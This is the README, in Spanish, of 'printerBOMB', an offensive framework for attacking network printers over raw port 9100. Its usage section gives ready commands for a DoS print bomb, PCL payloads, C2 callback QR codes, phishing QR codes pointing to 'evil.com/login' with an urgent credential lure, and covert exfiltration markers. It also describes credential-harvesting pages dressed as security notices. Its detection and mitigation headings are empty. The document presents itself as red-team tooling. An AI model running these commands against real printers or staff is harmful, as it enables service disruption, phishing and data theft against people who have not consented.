
Marco de explotación de impresoras para pruebas de seguridad a través del puerto raw 9100, con entrega de payloads PCL, bombardeo DoS, códigos QR C2, códigos QR de phishing y marcadores de exfiltración encubierta.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Framework de Ataque de Cola de Impresión
Explotando el vector de ataque ignorado: Tus Impresoras de Red
Desarrollado por: Azhari Ramadhan 🔥
PrintHack es una herramienta sofisticada de explotación de impresoras diseñada para profesionales de seguridad, red teamers y probadores de penetración. Esta herramienta aprovecha el protocolo de cola de impresión en bruto (Puerto 9100) para realizar evaluaciones de seguridad, probar vulnerabilidades de impresoras y simular escenarios de ataque del mundo real.
⚠️ AVISO LEGAL: Esta herramienta está destinada únicamente a pruebas de seguridad legítimas y fines educativos. Úsala de manera responsable y solo en sistemas que poseas o para los que tengas autorización explícita de prueba.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Procesamiento de imágenesqrcode - Generación de códigos QRrequests - Solicitudes HTTPpip install Pillow qrcode requests
# Probar conectividad de la impresora
python3 printerhack.py -t 192.168.1.100 --check
# Enviar página de prueba
python3 printerhack.py -t 192.168.1.100 --test
# Imprimir mensaje personalizado
python3 printerhack.py -t 192.168.1.100 -m "¡Hola desde Red Team!"
# Imprimir imagen desde URL (convertida a ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# Enviar payload PCL
python3 printerhack.py -t 192.168.1.100 --pcl
# Bomba de impresión (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# Imprimir código QR de callback C2
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Imprimir código QR de phishing
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENTE: Verifica tus credenciales"
# Imprimir a múltiples impresoras desde archivo
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Mensaje de Prueba de Seguridad"
Imprime mensajes encubiertos o instrucciones en impresoras comprometidas en escenarios de acceso físico.
Imprime códigos QR que enlazan a páginas de recolección de credenciales disfrazadas de avisos de seguridad.
Usa la salida de la impresora como canal encubierto de exfiltración para datos codificados.
Prueba la resiliencia organizacional contra ataques de denegación de servicio basados en impresoras.
Enumera e identifica impresoras a través de la red.
Indicadores de Detección:
Estrategias de Mitigación:
ESTA HERRAMIENTA SE PROPORCIONA "TAL CUAL" SOLO PARA PRUEBAS DE SEGURIDAD LEGÍTIMAS.
EL AUTOR NO ES RESPONSABLE DE NINGÚN USO INDEBIDO DE ESTA HERRAMIENTA.
SIEMPRE obtén autorización por escrito antes de probar cualquier sistema.
El uso no autorizado puede violar la Ley de Fraude y Abuso Informático (CFAA)
y leyes similares en tu jurisdicción.
Desarrollado por: Azhari Ramadhan
¡Las contribuciones son bienvenidas! Por favor, asegúrate de:
Desarrollador: Azhari Ramadhan 🔥
Licencia MIT - Consulta LICENSE para más detalles
🖨️ printerBOMB - Explotando la Última Línea de Defensa
Adelántate a los atacantes pensando como ellos
Hecho con 🔥 por Azhari Ramadhan
| Característica | Descripción |
|---|
--check | Probar conectividad de la impresora |
--test | Enviar página de prueba |
--message | Imprimir payloads personalizados |
--image | Imprimir imagen desde URL (arte ASCII) |
--pcl | Enviar payload con formato PCL |
--bomb | Ataque DoS (payload masivo) |
--c2 | Imprimir código QR de callback C2 |
--phish | Imprimir código QR de phishing |
--exfil | Imprimir marcador de exfiltración de datos |
--file | Impresión masiva a múltiples objetivos |